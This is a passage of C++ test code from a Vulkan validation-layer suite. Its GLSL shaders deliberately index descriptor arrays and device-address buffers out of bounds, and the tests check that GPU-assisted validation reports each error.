VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_writes[1].pImageInfo = image_info; vk::UpdateDescriptorSets(m_device->device(), 2, descriptor_writes, 0, NULL); if (descriptor_indexing) { descriptor_writes[0].dstSet = descriptor_set_variable.set_; descriptor_writes[1].dstSet = descriptor_set_variable.set_; vk::UpdateDescriptorSets(m_device->device(), 2, descriptor_writes, 0, NULL); } ds_binding_flags[0] = 0; ds_binding_flags[1] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT; // Resources for buffer tests OneOffDescriptorSet descriptor_set_buffer(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 6, VK_SHADER_STAGE_ALL, nullptr}, }, 0, layout_pnext, 0); const VkPipelineLayoutObj pipeline_layout_buffer(m_device, {&descriptor_set_buffer.layout_}); VkDescriptorBufferInfo buffer_test_buffer_info[7] = {}; buffer_test_buffer_info[0].buffer = buffer0.handle(); buffer_test_buffer_info[0].offset = 0; buffer_test_buffer_info[0].range = sizeof(uint32_t); for (int i = 1; i < 7; i++) { buffer_test_buffer_info[i].buffer = buffer1.handle(); buffer_test_buffer_info[i].offset = 0; buffer_test_buffer_info[i].range = 4 * sizeof(float); } if (descriptor_indexing) { VkWriteDescriptorSet buffer_descriptor_writes[2] = {}; buffer_descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; buffer_descriptor_writes[0].dstSet = descriptor_set_buffer.set_; // descriptor_set; buffer_descriptor_writes[0].dstBinding = 0; buffer_descriptor_writes[0].descriptorCount = 1; buffer_descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; buffer_descriptor_writes[0].pBufferInfo = buffer_test_buffer_info; buffer_descriptor_writes[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; buffer_descriptor_writes[1].dstSet = descriptor_set_buffer.set_; // descriptor_set; buffer_descriptor_writes[1].dstBinding = 1; buffer_descriptor_writes[1].descriptorCount = 5; // Intentionally don't write index 5 buffer_descriptor_writes[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; buffer_descriptor_writes[1].pBufferInfo = &buffer_test_buffer_info[1]; vk::UpdateDescriptorSets(m_device->device(), 2, buffer_descriptor_writes, 0, NULL); } // Shader programs for array OOB test in vertex stage: // - The vertex shader fetches the invalid index from the uniform buffer and uses it to make an invalid index into another // array. char const *vsSource_vert = "#version 450\n" "\n" "layout(std140, set = 0, binding = 0) uniform foo { uint tex_index[1]; } uniform_index_buffer;\n" "layout(set = 0, binding = 1) uniform sampler2D tex[6];\n" "vec2 vertices[3];\n" "void main(){\n" " vertices[0] = vec2(-1.0, -1.0);\n" " vertices[1] = vec2( 1.0, -1.0);\n" " vertices[2] = vec2( 0.0, 1.0);\n" " gl_Position = vec4(vertices[gl_VertexIndex % 3], 0.0, 1.0);\n" " gl_Position += 1e-30 * texture(tex[uniform_index_buffer.tex_index[0]], vec2(0, 0));\n" "}\n"; char const *fsSource_vert = "#version 450\n" "\n" "layout(set = 0, binding = 1) uniform sampler2D tex[6];\n" "layout(location = 0) out vec4 uFragColor;\n" "void main(){\n" " uFragColor = texture(tex[0], vec2(0, 0));\n" "}\n"; // Shader programs for array OOB test in fragment stage: // - The vertex shader fetches the invalid index from the uniform buffer and passes it to the fragment shader. // - The fragment shader makes the invalid array access. char const *vsSource_frag = "#version 450\n" "\n" "layout(std140, binding = 0) uniform foo { uint tex_index[1]; } uniform_index_buffer;\n" "layout(location = 0) out flat uint index;\n" "vec2 vertices[3];\n" "void main(){\n" " vertices[0] = vec2(-1.0, -1.0);\n" " vertices[1] = vec2( 1.0, -1.0);\n" " vertices[2] = vec2( 0.0, 1.0);\n" " gl_Position = vec4(vertices[gl_VertexIndex % 3], 0.0, 1.0);\n" " index = uniform_index_buffer.tex_index[0];\n" "}\n"; char const *fsSource_frag = "#version 450\n" "\n" "layout(set = 0, binding = 1) uniform sampler2D tex[6];\n" "layout(location = 0) out vec4 uFragColor;\n" "layout(location = 0) in flat uint index;\n" "void main(){\n" " uFragColor = texture(tex[index], vec2(0, 0));\n" "}\n"; char const *fsSource_frag_runtime = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n" "\n" "layout(set = 0, binding = 1) uniform sampler2D tex[];\n" "layout(location = 0) out vec4 uFragColor;\n" "layout(location = 0) in flat uint index;\n" "void main(){\n" " uFragColor = texture(tex[index], vec2(0, 0));\n" "}\n"; char const *fsSource_buffer = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "\n" "layout(set = 0, binding = 1) buffer foo { vec4 val; } colors[];\n" "layout(location = 0) out vec4 uFragColor;\n" "layout(location = 0) in flat uint index;\n" "void main(){\n" " uFragColor = colors[index].val;\n" "}\n"; char const *gsSource = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "layout(triangles) in;\n" "layout(triangle_strip, max_vertices=3) out;\n" "layout(location=0) in VertexData { vec4 x; } gs_in[];\n" "layout(std140, set = 0, binding = 0) uniform ufoo { uint index; } uniform_index_buffer;\n" "layout(set = 0, binding = 1) buffer bfoo { vec4 val; } adds[];\n" "void main() {\n" " gl_Position = gs_in[0].x + adds[uniform_index_buffer.index].val.x;\n" " EmitVertex();\n" "}\n"; static const char *tesSource = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "layout(std140, set = 0, binding = 0) uniform ufoo { uint index; } uniform_index_buffer;\n" "layout(set = 0, binding = 1) buffer bfoo { vec4 val; } adds[];\n" "layout(triangles, equal_spacing, cw) in;\n" "void main() {\n" " gl_Position = adds[uniform_index_buffer.index].val;\n" "}\n"; struct TestCase { char const *vertex_source; char const *fragment_source; char const *geometry_source; char const *tess_ctrl_source; char const *tess_eval_source; bool debug; const VkPipelineLayoutObj *pipeline_layout; const OneOffDescriptorSet *descriptor_set; uint32_t index; char const *expected_error; }; std::vector<TestCase> tests; tests.push_back({vsSource_vert, fsSource_vert, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 25, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_frag, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 25, "Index of 25 used to index descriptor array of length 6."}); #if !defined(ANDROID) // The Android test framework uses shaderc for online compilations. Even when configured to compile with debug info, // shaderc seems to drop the OpLine instructions from the shader binary. This causes the following two tests to fail // on Android platforms. Skip these tests until the shaderc issue is understood/resolved. tests.push_back({vsSource_vert, fsSource_vert, nullptr, nullptr, nullptr, true, &pipeline_layout, &descriptor_set, 25, "gl_Position += 1e-30 * texture(tex[uniform_index_buffer.tex_index[0]], vec2(0, 0));"}); tests.push_back({vsSource_frag, fsSource_frag, nullptr, nullptr, nullptr, true, &pipeline_layout, &descriptor_set, 25, "uFragColor = texture(tex[index], vec2(0, 0));"}); #endif if (descriptor_indexing) { tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 25, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 5, "Descriptor index 5 is uninitialized"}); // Pick 6 below because it is less than the maximum specified, but more than the actual specified tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout_variable, &descriptor_set_variable, 6, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout_variable, &descriptor_set_variable, 5, "Descriptor index 5 is uninitialized"}); tests.push_back({vsSource_frag, fsSource_buffer, nullptr, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 25, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_buffer, nullptr, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 5, "Descriptor index 5 is uninitialized"}); if (m_device->phy().features().geometryShader) { // OOB Geometry tests.push_back({bindStateVertShaderText, bindStateFragShaderText, gsSource, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 25, "Stage = Geometry"}); // Uninitialized Geometry tests.push_back({bindStateVertShaderText, bindStateFragShaderText, gsSource, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 5, "Stage = Geometry"}); } if (m_device->phy().features().tessellationShader) { tests.push_back({bindStateVertShaderText, bindStateFragShaderText, nullptr, bindStateTscShaderText, tesSource, false, &pipeline_layout_buffer, &descriptor_set_buffer, 25, "Stage = Tessellation Eval"}); tests.push_back({bindStateVertShaderText, bindStateFragShaderText, nullptr, bindStateTscShaderText, tesSource, false, &pipeline_layout_buffer, &descriptor_set_buffer, 5, "Stage = Tessellation Eval"}); } } VkViewport viewport = m_viewports[0]; VkRect2D scissors = m_scissors[0]; VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); for (const auto &iter : tests) { VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, iter.expected_error); VkShaderObj vs(m_device, iter.vertex_source, VK_SHADER_STAGE_VERTEX_BIT, this, "main", iter.debug); VkShaderObj fs(m_device, iter.fragment_source, VK_SHADER_STAGE_FRAGMENT_BIT, this, "main", iter.debug); VkShaderObj *gs = nullptr; VkShaderObj *tcs = nullptr; VkShaderObj *tes = nullptr; VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); if (iter.geometry_source) { gs = new VkShaderObj(m_device, iter.geometry_source, VK_SHADER_STAGE_GEOMETRY_BIT, this, "main", iter.debug); pipe.AddShader(gs); } if (iter.tess_ctrl_source && iter.tess_eval_source) { tcs = new VkShaderObj(m_device, iter.tess_ctrl_source, VK_SHADER_STAGE_TESSELLATION_CONTROL_BIT, this, "main", iter.debug); tes = new VkShaderObj(m_device, iter.tess_eval_source, VK_SHADER_STAGE_TESSELLATION_EVALUATION_BIT, this, "main", iter.debug); pipe.AddShader(tcs); pipe.AddShader(tes); VkPipelineInputAssemblyStateCreateInfo iasci{VK_STRUCTURE_TYPE_PIPELINE_INPUT_ASSEMBLY_STATE_CREATE_INFO, nullptr, 0, VK_PRIMITIVE_TOPOLOGY_PATCH_LIST, VK_FALSE}; VkPipelineTessellationDomainOriginStateCreateInfo tessellationDomainOriginStateInfo = { VK_STRUCTURE_TYPE_PIPELINE_TESSELLATION_DOMAIN_ORIGIN_STATE_CREATE_INFO, VK_NULL_HANDLE, VK_TESSELLATION_DOMAIN_ORIGIN_UPPER_LEFT}; VkPipelineTessellationStateCreateInfo tsci{VK_STRUCTURE_TYPE_PIPELINE_TESSELLATION_STATE_CREATE_INFO, &tessellationDomainOriginStateInfo, 0, 3}; pipe.SetTessellation(&tsci); pipe.SetInputAssembly(&iasci); } pipe.AddDefaultColorAttachment(); err = pipe.CreateVKPipeline(iter.pipeline_layout->handle(), renderPass()); ASSERT_VK_SUCCESS(err); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, iter.pipeline_layout->handle(), 0, 1, &iter.descriptor_set->set_, 0, nullptr); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissors); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); uint32_t *data = (uint32_t *)buffer0.memory().map(); data[0] = iter.index; buffer0.memory().unmap(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->VerifyFound(); if (gs) { delete gs; } if (tcs && tes) { delete tcs; delete tes; } } auto c_queue = m_device->GetDefaultComputeQueue(); if (c_queue && descriptor_indexing) { char const *csSource = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "layout(set = 0, binding = 0) uniform ufoo { uint index; } u_index;" "layout(set = 0, binding = 1) buffer StorageBuffer {\n" " uint data;\n" "} Data[];\n" "void main() {\n" " Data[(u_index.index - 1)].data = Data[u_index.index].data;\n" "}\n"; auto shader_module = new VkShaderObj(m_device, csSource, VK_SHADER_STAGE_COMPUTE_BIT, this); VkPipelineShaderStageCreateInfo stage; stage.sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage.pNext = nullptr; stage.flags = 0; stage.stage = VK_SHADER_STAGE_COMPUTE_BIT; stage.module = shader_module->handle(); stage.pName = "main"; stage.pSpecializationInfo = nullptr; // CreateComputePipelines VkComputePipelineCreateInfo pipeline_info = {}; pipeline_info.sType = VK_STRUCTURE_TYPE_COMPUTE_PIPELINE_CREATE_INFO; pipeline_info.pNext = nullptr; pipeline_info.flags = 0; pipeline_info.layout = pipeline_layout_buffer.handle(); pipeline_info.basePipelineHandle = VK_NULL_HANDLE; pipeline_info.basePipelineIndex = -1; pipeline_info.stage = stage; VkPipeline c_pipeline; vk::CreateComputePipelines(device(), VK_NULL_HANDLE, 1, &pipeline_info, nullptr, &c_pipeline); VkCommandBufferBeginInfo begin_info = {}; VkCommandBufferInheritanceInfo hinfo = {}; hinfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; begin_info.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; begin_info.pInheritanceInfo = &hinfo; m_commandBuffer->begin(&begin_info); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_COMPUTE, c_pipeline); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_COMPUTE, pipeline_layout_buffer.handle(), 0, 1, &descriptor_set_buffer.set_, 0, nullptr); vk::CmdDispatch(m_commandBuffer->handle(), 1, 1, 1); m_commandBuffer->end(); // Uninitialized uint32_t *data = (uint32_t *)buffer0.memory().map(); data[0] = 5; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "Stage = Compute"); vk::QueueSubmit(c_queue->handle(), 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->VerifyFound(); // Out of Bounds data = (uint32_t *)buffer0.memory().map(); data[0] = 25; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "Stage = Compute"); vk::QueueSubmit(c_queue->handle(), 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->VerifyFound(); vk::DestroyPipeline(m_device->handle(), c_pipeline, NULL); vk::DestroyShaderModule(m_device->handle(), shader_module->handle(), NULL); } return; } TEST_F(VkLayerTest, GpuBufferDeviceAddressOOB) { bool supported = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); VkValidationFeatureEnableEXT enables[] = {VK_VALIDATION_FEATURE_ENABLE_GPU_ASSISTED_EXT}; VkValidationFeaturesEXT features = {}; features.sType = VK_STRUCTURE_TYPE_VALIDATION_FEATURES_EXT; features.enabledValidationFeatureCount = 1; features.pEnabledValidationFeatures = enables; InitFramework(myDbgFunc, m_errorMonitor, &features); if (DeviceIsMockICD() || DeviceSimulation()) { printf("%s GPU-Assisted validation test requires a driver that can draw.\n", kSkipPrefix); return; } supported = supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_BUFFER_DEVICE_ADDRESS_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_BUFFER_DEVICE_ADDRESS_EXTENSION_NAME); VkPhysicalDeviceFeatures2KHR features2 = {}; auto bda_features = lvl_init_struct<VkPhysicalDeviceBufferDeviceAddressFeaturesKHR>(); PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&bda_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); supported = supported && bda_features.bufferDeviceAddress; if (!supported) { printf("%s Buffer Device Address feature not supported, skipping test\n", kSkipPrefix); return; } VkCommandPoolCreateFlags pool_flags = VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, pool_flags)); if (m_device->props.apiVersion < VK_API_VERSION_1_1) { printf("%s GPU-Assisted validation test requires Vulkan 1.1+.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Make a uniform buffer to be passed to the shader that contains the pointer and write count uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 8; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer0; VkMemoryPropertyFlags mem_props = VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT; buffer0.init(*m_device, bci, mem_props); // Make another buffer to write to bci.usage = VK_BUFFER_USAGE_SHADER_DEVICE_ADDRESS_BIT_KHR; bci.size = 64; // Buffer should be 16*4 = 64 bytes VkBuffer buffer1; vk::CreateBuffer(device(), &bci, NULL, &buffer1); VkMemoryRequirements buffer_mem_reqs = {}; vk::GetBufferMemoryRequirements(device(), buffer1, &buffer_mem_reqs); VkMemoryAllocateInfo buffer_alloc_info = {}; buffer_alloc_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; buffer_alloc_info.allocationSize = buffer_mem_reqs.size; m_device->phy().set_memory_type(buffer_mem_reqs.memoryTypeBits, &buffer_alloc_info, 0); VkMemoryAllocateFlagsInfo alloc_flags = {VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_FLAGS_INFO}; alloc_flags.flags = VK_MEMORY_ALLOCATE_DEVICE_ADDRESS_BIT_KHR; buffer_alloc_info.pNext = &alloc_flags; VkDeviceMemory buffer_mem; VkResult err = vk::AllocateMemory(device(), &buffer_alloc_info, NULL, &buffer_mem); ASSERT_VK_SUCCESS(err); vk::BindBufferMemory(m_device->device(), buffer1, buffer_mem, 0); // Get device address of buffer to write to VkBufferDeviceAddressInfoKHR bda_info = {}; bda_info.sType = VK_STRUCTURE_TYPE_BUFFER_DEVICE_ADDRESS_INFO_KHR; bda_info.buffer = buffer1; auto vkGetBufferDeviceAddressKHR = (PFN_vkGetBufferDeviceAddressKHR)vk::GetDeviceProcAddr(m_device->device(), "vkGetBufferDeviceAddressKHR"); ASSERT_TRUE(vkGetBufferDeviceAddressKHR != nullptr); auto pBuffer = vkGetBufferDeviceAddressKHR(m_device->device(), &bda_info); OneOffDescriptorSet descriptor_set(m_device, {{0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}}); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); VkDescriptorBufferInfo buffer_test_buffer_info[2] = {}; buffer_test_buffer_info[0].buffer = buffer0.handle(); buffer_test_buffer_info[0].offset = 0; buffer_test_buffer_info[0].range = sizeof(uint32_t); VkWriteDescriptorSet descriptor_writes[1] = {}; descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[0].dstSet = descriptor_set.set_; descriptor_writes[0].dstBinding = 0; descriptor_writes[0].descriptorCount = 1; descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_writes[0].pBufferInfo = buffer_test_buffer_info; vk::UpdateDescriptorSets(m_device->device(), 1, descriptor_writes, 0, NULL); char const *shader_source = "#version 450\n" "#extension GL_EXT_buffer_reference : enable\n " "layout(buffer_reference, buffer_reference_align = 16) buffer bufStruct;\n" "layout(set = 0, binding = 0) uniform ufoo {\n" " bufStruct data;\n" " int nWrites;\n" "} u_info;\n" "layout(buffer_reference, std140) buffer bufStruct {\n" " int a[4];\n" "};\n" "void main() {\n" " for (int i=0; i < u_info.nWrites; ++i) {\n" " u_info.data.a[i] = 0xdeadca71;\n" " }\n" "}\n"; VkShaderObj vs(m_device, shader_source, VK_SHADER_STAGE_VERTEX_BIT, this, "main", true); VkViewport viewport = m_viewports[0]; VkRect2D scissors = m_scissors[0]; VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddDefaultColorAttachment(); err = pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); ASSERT_VK_SUCCESS(err); VkCommandBufferBeginInfo begin_info = {}; VkCommandBufferInheritanceInfo hinfo = {}; hinfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; begin_info.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; begin_info.pInheritanceInfo = &hinfo; m_commandBuffer->begin(&begin_info); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, nullptr); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissors); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); // Starting address too low VkDeviceAddress *data = (VkDeviceAddress *)buffer0.memory().map(); data[0] = pBuffer - 16; data[1] = 4; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "access out of bounds"); err = vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); ASSERT_VK_SUCCESS(err); err = vk::QueueWaitIdle(m_device->m_queue); ASSERT_VK_SUCCESS(err); m_errorMonitor->VerifyFound(); // Run past the end data = (VkDeviceAddress *)buffer0.memory().map(); data[0] = pBuffer; data[1] = 5; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "access out of bounds"); err = vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); ASSERT_VK_SUCCESS(err); err = vk::QueueWaitIdle(m_device->m_queue); ASSERT_VK_SUCCESS(err); m_errorMonitor->VerifyFound(); // Positive test - stay inside buffer m_errorMonitor->ExpectSuccess(); data = (VkDeviceAddress *)buffer0.memory().map(); data[0] = pBuffer; data[1] = 4; buffer0.memory().unmap(); err = vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); ASSERT_VK_SUCCESS(err); err = vk::QueueWaitIdle(m_device->m_queue); ASSERT_VK_SUCCESS(err); m_errorMonitor->VerifyNotFound(); vk::DestroyBuffer(m_device->handle(), buffer1, NULL); vk::FreeMemory(m_device->handle(), buffer_mem, NULL); } TEST_F(VkLayerTest, GpuValidationArrayOOBRayTracingShaders) { TEST_DESCRIPTION( "GPU validation: Verify detection of out-of-bounds descriptor array indexing and use of uninitialized descriptors for " "ray tracing shaders."); std::array<const char *, 1> required_instance_extensions = {VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME}; for (auto instance_extension : required_instance_extensions) { if (InstanceExtensionSupported(instance_extension)) { m_instance_extension_names.push_back(instance_extension); } else { printf("%s Did not find required instance extension %s; skipped.\n", kSkipPrefix, instance_extension); return; } } VkValidationFeatureEnableEXT validation_feature_enables[] = {VK_VALIDATION_FEATURE_ENABLE_GPU_ASSISTED_EXT}; VkValidationFeaturesEXT validation_features = {}; validation_features.sType = VK_STRUCTURE_TYPE_VALIDATION_FEATURES_EXT; validation_features.enabledValidationFeatureCount = 1; validation_features.pEnabledValidationFeatures = validation_feature_enables; bool descriptor_indexing = CheckDescriptorIndexingSupportAndInitFramework( this, m_instance_extension_names, m_device_extension_names, &validation_features, m_errorMonitor); if (DeviceIsMockICD() || DeviceSimulation()) { printf("%s Test not supported by MockICD, skipping tests\n", kSkipPrefix); return; } std::array<const char *, 2> required_device_extensions = {VK_KHR_GET_MEMORY_REQUIREMENTS_2_EXTENSION_NAME, VK_NV_RAY_TRACING_EXTENSION_NAME}; for (auto device_extension : required_device_extensions) { if (DeviceExtensionSupported(gpu(), nullptr, device_extension)) { m_device_extension_names.push_back(device_extension); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, device_extension); return; } } VkPhysicalDeviceFeatures2KHR features2 = {}; auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); if (descriptor_indexing) { PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); if (!indexing_features.runtimeDescriptorArray || !indexing_features.descriptorBindingPartiallyBound || !indexing_features.descriptorBindingSampledImageUpdateAfterBind || !indexing_features.descriptorBindingVariableDescriptorCount) { printf("Not all descriptor indexing features supported, skipping descriptor indexing tests\n"); descriptor_indexing = false; } } VkCommandPoolCreateFlags pool_flags = VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, pool_flags)); PFN_vkGetPhysicalDeviceProperties2KHR vkGetPhysicalDeviceProperties2KHR = (PFN_vkGetPhysicalDeviceProperties2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceProperties2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceProperties2KHR != nullptr); auto ray_tracing_properties = lvl_init_struct<VkPhysicalDeviceRayTracingPropertiesNV>(); auto properties2 = lvl_init_struct<VkPhysicalDeviceProperties2KHR>(&ray_tracing_properties); vkGetPhysicalDeviceProperties2KHR(gpu(), &properties2); if (ray_tracing_properties.maxTriangleCount == 0) { printf("%s Did not find required ray tracing properties; skipped.\n", kSkipPrefix); return; } VkQueue ray_tracing_queue = m_device->m_queue; uint32_t ray_tracing_queue_family_index = 0; // If supported, run on the compute only queue. uint32_t compute_only_queue_family_index = m_device->QueueFamilyMatching(VK_QUEUE_COMPUTE_BIT, VK_QUEUE_GRAPHICS_BIT); if (compute_only_queue_family_index != UINT32_MAX) { const auto &compute_only_queues = m_device->queue_family_queues(compute_only_queue_family_index); if (!compute_only_queues.empty()) { ray_tracing_queue = compute_only_queues[0]->handle(); ray_tracing_queue_family_index = compute_only_queue_family_index; } } VkCommandPoolObj ray_tracing_command_pool(m_device, ray_tracing_queue_family_index, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT); VkCommandBufferObj ray_tracing_command_buffer(m_device, &ray_tracing_command_pool); struct AABB { float min_x; float min_y; float min_z; float max_x; float max_y; float max_z; }; const std::vector<AABB> aabbs = {{-1.0f, -1.0f, -1.0f, +1.0f, +1.0f, +1.0f}}; struct VkGeometryInstanceNV { float transform[12]; uint32_t instanceCustomIndex : 24; uint32_t mask : 8; uint32_t instanceOffset : 24; uint32_t flags : 8; uint64_t accelerationStructureHandle; }; VkDeviceSize aabb_buffer_size = sizeof(AABB) * aabbs.size(); VkBufferObj aabb_buffer; aabb_buffer.init(*m_device, aabb_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV, {ray_tracing_queue_family_index}); uint8_t *mapped_aabb_buffer_data = (uint8_t *)aabb_buffer.memory().map(); std::memcpy(mapped_aabb_buffer_data, (uint8_t *)aabbs.data(), static_cast<std::size_t>(aabb_buffer_size)); aabb_buffer.memory().unmap(); VkGeometryNV geometry = {}; geometry.sType = VK_STRUCTURE_TYPE_GEOMETRY_NV; geometry.geometryType = VK_GEOMETRY_TYPE_AABBS_NV; geometry.geometry.triangles = {}; geometry.geometry.triangles.sType = VK_STRUCTURE_TYPE_GEOMETRY_TRIANGLES_NV; geometry.geometry.aabbs = {}; geometry.geometry.aabbs.sType = 